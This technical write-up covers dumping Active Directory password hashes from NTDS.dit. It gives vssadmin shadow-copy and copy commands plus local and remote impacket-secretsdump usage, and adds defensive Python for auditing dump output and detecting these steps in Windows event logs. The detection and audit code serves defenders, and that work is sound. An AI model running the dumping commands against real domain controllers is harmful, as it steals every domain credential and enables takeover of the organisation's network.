Domain-joined Windows systems send logon requests to Domain Controllers (DCs) in the same Active Directory forest. Each Domain Controller hosts an NTDS.dit file, which is synchronized across all DCs except Read-Only Domain Controllers. It is typically stored at %SystemRoot%\NTDS\ntds.dit (the path the copy command below reads from the shadow copy).

This database file stores Active Directory data including:

  • User accounts (username & password hash)
  • Group accounts
  • Computer accounts
  • Group policy objects

NTDS.dit Dump File

NT Directory Services (NTDS) is the directory service Active Directory uses to locate and organize network resources; the .dit extension stands for directory information tree. NTDS.dit is the primary database file of AD and stores every domain username, every password hash, and the rest of the schema and object data. Because the file is held open by the directory service while the DC runs, it cannot be copied directly, which is why the procedure below first takes a Volume Shadow Copy and copies the file from that snapshot.

# Creating shadow copy of C:
vssadmin CREATE SHADOW /For=C:

# Copying NTDS.dit from the VSS (shadow copy index 1 is the one just created)
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS.dit

The SYSTEM registry hive (HKLM\SYSTEM) is also required: it holds the boot key that decrypts the password hashes stored in NTDS.dit, so a copy of NTDS.dit on its own cannot be read.

# Dumping using impacket - secretsdump (system.save is the exported HKLM\SYSTEM hive)
impacket-secretsdump -ntds NTDS.dit -system system.save LOCAL
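Once the dump exists, the defender-side question is what it reveals about password hygiene. The following is an added example (not code from this write-up and not part of impacket): it parses secretsdump-style NTDS output lines in the `domain\user:rid:lmhash:nthash:::` format and flags accounts that share an NT hash (same password), accounts that still carry a populated LM hash, and accounts with an empty password. The sample lines and hash values are constructed for the example.

```python
"""Audit secretsdump-style NTDS output for credential hygiene problems.

Added example, not impacket code. Input format is the hash line secretsdump
prints for NTDS:  domain\\user:rid:lmhash:nthash:::
All sample lines and hash values below are constructed.
"""
import re
from collections import defaultdict

# LM field secretsdump prints when LM hash storage is disabled (the usual case).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# Well-known NT hash of the empty password.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::",
    re.IGNORECASE,
)

# Constructed sample dump: two human accounts share an NT hash, one service
# account still has an LM hash, and Guest has an empty password.
SAMPLE_DUMP = """\
ILF.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
ILF.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ILF.local\\jmarston:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
ILF.local\\svc_backup:1105:11223344556677889900aabbccddeeff:ffeeddccbbaa00998877665544332211:::
ILF.local\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""


def parse_dump(text):
    """Return one dict per parsed hash line; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # secretsdump also prints banners and kerberos keys; ignore them
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        records.append(rec)
    return records


def find_shared_nt_hashes(records):
    """Group accounts by NT hash; return {nt_hash: [users]} for hashes used by more than one account."""
    by_hash = defaultdict(list)
    for rec in records:
        by_hash[rec["nt"]].append(rec["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def find_lm_hashes(records):
    """Accounts whose LM hash is populated, i.e. LM storage is still enabled for them."""
    return [rec["user"] for rec in records if rec["lm"] != EMPTY_LM]


def find_empty_passwords(records):
    """Accounts whose NT hash equals the hash of the empty string."""
    return [rec["user"] for rec in records if rec["nt"] == EMPTY_NT]


def audit(text):
    """Run all checks over a dump and return a summary dict."""
    records = parse_dump(text)
    return {
        "parsed": len(records),
        "shared_nt": find_shared_nt_hashes(records),
        "lm_present": find_lm_hashes(records),
        "empty_password": find_empty_passwords(records),
    }


if __name__ == "__main__":
    result = audit(SAMPLE_DUMP)
    print(f"parsed {result['parsed']} hash lines")
    for nt, users in result["shared_nt"].items():
        print(f"shared NT hash {nt}: {', '.join(users)}")
    print("LM hash present:", result["lm_present"])
    print("empty password:", result["empty_password"])
```

The script never attempts to crack anything; a shared NT hash already proves two accounts use the same password, and a populated LM hash proves the LM storage policy is not enforced for that account, which is enough to drive remediation without recovering a single plaintext.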

Remote Dumping

It is also possible to dump the credentials over the network without first copying NTDS.dit. Given an account that holds directory replication rights on the DC (Domain Admins by default), secretsdump requests the password hashes through the directory replication service, the same mechanism DCSync uses, so on the DC the activity shows up as replication requests (Security Event ID 4662) rather than as file access or shadow-copy creation.

# Dumping using impacket - secretsdump
impacket-secretsdump ILF.local/jmarston@$IP
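Both paths on this page leave distinct traces on the Domain Controller. The following is an added example, not part of the original write-up: three detection rules run over normalized Windows Security events, covering shadow-copy creation by vssadmin and the copy of NTDS.dit out of a shadow-copy device path (both from 4688 or Sysmon 1 command lines) for the local procedure, and replication rights exercised by a non-DC account (4662) for the remote procedure. The event records are constructed; the field names follow the Security log's 4688 and 4662 events, and the two control-access-right GUIDs are the published DS-Replication-Get-Changes and DS-Replication-Get-Changes-All values.

```python
"""Detection rules for the two NTDS.dit extraction paths described above.

Added example (not part of the write-up). Events are dicts with the field
names used by Security log events 4688 (process creation) and 4662 (object
operation); the sample records are constructed.
"""
import re

# Control-access-right GUIDs recorded in a 4662 "Properties" field when an
# account replicates directory secrets.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# vssadmin creating a shadow copy (the page's first step).
VSS_CREATE_RE = re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\b.*\bshadow\b", re.I)
# ntds.dit read through a shadow-copy device path (the page's second step).
NTDS_FROM_SHADOW_RE = re.compile(r"harddiskvolumeshadowcopy\d+\\.*ntds\.dit", re.I)
GUID_RE = re.compile(r"[0-9a-f-]{36}", re.I)

# Constructed sample events: the local procedure from the page, a benign
# vssadmin query, legitimate DC-to-DC replication, and a user account replicating.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "jmarston",
     "CommandLine": "vssadmin CREATE SHADOW /For=C:"},
    {"EventID": 4688, "SubjectUserName": "jmarston",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS.dit"},
    {"EventID": 4688, "SubjectUserName": "backupsvc",
     "CommandLine": "vssadmin list shadows"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jmarston", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def _is_process_event(ev):
    # 4688 from the Security log or Sysmon Event ID 1 both carry a command line.
    return ev.get("EventID") in (4688, 1)


def rule_vss_create(ev):
    """Shadow copy created with vssadmin."""
    return _is_process_event(ev) and bool(VSS_CREATE_RE.search(ev.get("CommandLine", "")))


def rule_ntds_from_shadow(ev):
    """ntds.dit referenced through a HarddiskVolumeShadowCopyN device path."""
    return _is_process_event(ev) and bool(NTDS_FROM_SHADOW_RE.search(ev.get("CommandLine", "")))


def rule_replication_by_non_dc(ev):
    """Directory replication rights used by an account that is not a DC computer account."""
    if ev.get("EventID") != 4662:
        return False
    guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
    if not guids & REPLICATION_GUIDS:
        return False
    # DC computer accounts (names ending in $) replicate legitimately all day;
    # for a tighter rule, compare against the actual DC account list instead.
    return not ev.get("SubjectUserName", "").endswith("$")


RULES = {
    "vss_create": rule_vss_create,
    "ntds_from_shadow": rule_ntds_from_shadow,
    "replication_by_non_dc": rule_replication_by_non_dc,
}


def detect(events):
    """Return (rule_name, event_index, account) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, i, ev.get("SubjectUserName")))
    return hits


if __name__ == "__main__":
    for name, idx, who in detect(SAMPLE_EVENTS):
        print(f"{name}: event #{idx} by {who}")
```

Process-creation rules depend on command-line auditing being enabled (4688 with command line logging, or Sysmon); the 4662 rule depends on the default SACL on the domain object, which already audits these control-access rights, so it works without extra configuration. A short sequence of vss_create followed by ntds_from_shadow from the same account on a DC is the high-confidence pairing; either alone is worth a look but has benign explanations such as backup software.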